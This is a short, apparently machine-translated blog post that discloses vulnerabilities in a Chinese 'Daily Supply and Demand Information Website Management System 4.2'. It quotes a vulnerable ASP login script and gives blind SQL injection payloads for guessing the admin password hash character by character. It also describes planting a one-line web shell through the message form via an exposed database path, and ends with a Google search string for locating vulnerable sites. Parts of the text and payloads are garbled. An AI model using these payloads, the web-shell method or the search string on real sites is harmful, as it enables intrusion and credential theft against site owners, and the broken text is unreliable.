Daily supply and demand information website management system 4.20day

From alimail Blog http://www.virusest.com/
Daily Supply and Demand Information Website Management System 4.2 has the SQL injection and database plug-in Vulnerability
1. getpwd2.asp
<% Response. buffer = "True"
Dim rs, SQL, user, username
Dim problem, id
Username = request. form ("username ")
Problem = request. form ("problem ")
Dim connuser, password
SQL = "select * from [ttdv_user] where username =" & UserName &""
Set rs = server. createobject ("adodb. recordset ")
Rs. open SQL, conn, 1, 1
Session ("gpw_error") = session ("gpw_error") + 1
If rs. eof then response. write"


· The information you submitted is incorrect and the password cannot be retrieved!"
%>
We can see that the username is used as a filter, and the method is the same as that in the online shopping mall.
Or (select count (*) from ttdv_admin where id = 55 and asc (mid (password, 1, 1) between 48 and 57) <> 0 and = // determine whether the first digit of the password is a number. If yes, change the number range in sequence and determine the MD5 value of the password (48-57 for 0-9)

Or (select count (*) from ttdv_admin where id = 55 and asc (mid (password, 122) between 97 and) <> 0 and = // determine whether the first digit of the password is a letter. If yes, the same as above.
Submit the injection statement:
If it is correct, return to the next step ,:
Otherwise, an error message is returned,
However, this is relatively slow to use. You have to guess the 32-bit password for half a day. Look at the second hole:
2. If the database is not processed, you can insert a sentence. There is no need to encrypt a sentence here. Just submit the message directly. Because its anti-injection only defends against request. querystring.
Database address: data \ % 23 data % 23. asp. But the database connection was slow during the test. I waited for a while to display the database.
Google: inurl: onews. asp? Catid